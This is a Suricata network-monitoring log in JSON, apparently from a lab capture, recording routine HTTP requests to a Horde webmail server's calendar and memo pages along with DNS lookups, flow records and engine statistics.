{"timestamp":"2020-02-29T00:10:23.129248+0000","flow_id":110654126986856,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34788,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} 
{"timestamp":"2020-02-29T00:10:23.129248+0000","flow_id":110654126986856,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34788,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:10:23.175862+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:10:23.175862+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} {"timestamp":"2020-02-29T00:10:24.000668+0000","event_type":"stats","stats":{"uptime":14276,"capture":{"kernel_packets":134365,"kernel_drops":0},"decoder":{"pkts":134408,"bytes":92797098,"invalid":185,"ipv4":132931,"ipv6":8,"ethernet":134408,"raw":0,"null":0,"sll":0,"tcp":127724,"udp":5007,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2737,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2753,"synack":2744,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1777,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2286,"failed_udp":110},"tx":{"http":4582,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2365}},"flow_mgr":{"closed_pruned":2721,"new_pruned":15,"est_pruned":2341,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19179,"memcap_state":0,"memcap_
global":0},"http":{"memuse":80040,"memcap":0}}} {"timestamp":"2020-02-29T00:10:25.000291+0000","flow_id":374562667837138,"event_type":"flow","src_ip":"192.168.10.122","src_port":41142,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:23.472786+0000","end":"2020-02-29T00:05:23.581640+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:26.069213+0000","flow_id":106655512661597,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52175,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":40996,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:26.177585+0000","flow_id":106655512661597,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52175,"proto":"UDP","dns":{"type":"answer","id":40996,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:26.177585+0000","flow_id":106655512661597,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52175,"proto":"UDP","dns":{"type":"answer","id":40996,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:26.234777+0000","flow_id":1124421027940285,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752}} 
{"timestamp":"2020-02-29T00:10:28.134129+0000","flow_id":110654126986856,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34788,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:10:28.134889+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":3}} {"timestamp":"2020-02-29T00:10:30.000411+0000","flow_id":893553631413293,"event_type":"flow","src_ip":"192.168.10.122","src_port":51580,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:29.640045+0000","end":"2020-02-29T00:05:29.748633+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:10:31.000321+0000","event_type":"stats","stats":{"uptime":14283,"capture":{"kernel_packets":134418,"kernel_drops":0},"decoder":{"pkts":134436,"bytes":92807270,"invalid":185,"ipv4":132957,"ipv6":8,"ethernet":134436,"raw":0,"null":0,"sll":0,"tcp":127747,"udp":5010,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2738,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2754,"synack":2745,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1779,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2287,"failed_udp":110},"tx":{"http":4583,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2366}},"flow_mgr":{"closed_pruned":2721,"new_pruned":15,"est_pruned":2342,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18847,"memcap_state":0,"memcap_global":0},"http":{"memuse":98031,"memcap":0}}} 
{"timestamp":"2020-02-29T00:10:31.235722+0000","flow_id":1124421027940285,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52714,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:10:32.001842+0000","flow_id":1021062620573906,"event_type":"flow","src_ip":"192.168.10.122","src_port":33976,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:30.454866+0000","end":"2020-02-29T00:05:30.563509+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:32.002075+0000","flow_id":214948798715515,"event_type":"flow","src_ip":"192.168.10.122","src_port":60298,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:30.841339+0000","end":"2020-02-29T00:05:30.949739+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:32.002142+0000","flow_id":113437246634505,"event_type":"flow","src_ip":"192.168.10.122","src_port":41347,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:30.670217+0000","end":"2020-02-29T00:05:30.778890+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:10:35.072059+0000","flow_id":1681976502983035,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35187,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54980,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:35.180346+0000","flow_id":1681976502983035,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35187,"proto":"UDP","dns":{"type":"answer","id":54980,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:35.180346+0000","flow_id":1681976502983035,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35187,"proto":"UDP","dns":{"type":"answer","id":54980,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:35.205288+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} 
{"timestamp":"2020-02-29T00:10:35.205288+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":21,"tx_id":0}} {"timestamp":"2020-02-29T00:10:38.000235+0000","event_type":"stats","stats":{"uptime":14290,"capture":{"kernel_packets":134438,"kernel_drops":0},"decoder":{"pkts":134448,"bytes":92809310,"invalid":185,"ipv4":132969,"ipv6":8,"ethernet":134448,"raw":0,"null":0,"sll":0,"tcp":127757,"udp":5012,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2739,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2755,"synack":2746,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1780,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,
"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2288,"failed_udp":110},"tx":{"http":4584,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2367}},"flow_mgr":{"closed_pruned":2721,"new_pruned":15,"est_pruned":2346,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18184,"memcap_state":0,"memcap_global":0},"http":{"memuse":85424,"memcap":0}}} {"timestamp":"2020-02-29T00:10:39.238217+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:10:39.249184+0000","flow_id":1207756279237984,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45590,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43423,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:39.357577+0000","flow_id":1207756279237984,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45590,"proto":"UDP","dns":{"type":"answer","id":43423,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:10:39.357577+0000","flow_id":1207756279237984,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45590,"proto":"UDP","dns":{"type":"answer","id":43423,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:39.423600+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:10:39.423600+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":203,"tx_id":1}} {"timestamp":"2020-02-29T00:10:39.436232+0000","flow_id":2107843985516552,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4741,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:10:39.544428+0000","flow_id":2107843985516552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47317,"proto":"UDP","dns":{"type":"answer","id":4741,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:39.544428+0000","flow_id":2107843985516552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47317,"proto":"UDP","dns":{"type":"answer","id":4741,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:39.623452+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5582}} {"timestamp":"2020-02-29T00:10:41.000721+0000","flow_id":1096924642080953,"event_type":"flow","src_ip":"192.168.10.130","src_port":34776,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":14,"bytes_toserver":1975,"bytes_toclient":9936,"start":"2020-02-29T00:09:06.456889+0000","end":"2020-02-29T00:09:40.905025+0000","age":34,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:10:43.000564+0000","flow_id":1628697414491026,"event_type":"flow","src_ip":"192.168.10.122","src_port":50875,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:42.416658+0000","end":"2020-02-29T00:05:42.525766+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:43.170662+0000","flow_id":2049496855059110,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36997,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2212,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:43.278991+0000","flow_id":2049496855059110,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36997,"proto":"UDP","dns":{"type":"answer","id":2212,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:43.278991+0000","flow_id":2049496855059110,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36997,"proto":"UDP","dns":{"type":"answer","id":2212,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:43.455717+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6627}} 
{"timestamp":"2020-02-29T00:10:44.624419+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5582},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":28526,"tx_id":2}} {"timestamp":"2020-02-29T00:10:45.000222+0000","event_type":"stats","stats":{"uptime":14297,"capture":{"kernel_packets":134462,"kernel_drops":0},"decoder":{"pkts":134466,"bytes":92818316,"invalid":185,"ipv4":132985,"ipv6":8,"ethernet":134466,"raw":0,"null":0,"sll":0,"tcp":127769,"udp":5016,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2739,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2755,"synack":2746,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1780,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2290,"failed_udp":110},"tx":{"http":4586,"smtp":0,"tls":
0,"dns_tcp":0,"dns_udp":2369}},"flow_mgr":{"closed_pruned":2722,"new_pruned":15,"est_pruned":2346,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":96926,"memcap":0}}} {"timestamp":"2020-02-29T00:10:47.986535+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6627},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":31913,"tx_id":0}} {"timestamp":"2020-02-29T00:10:47.995571+0000","flow_id":1084958869762291,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42796,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 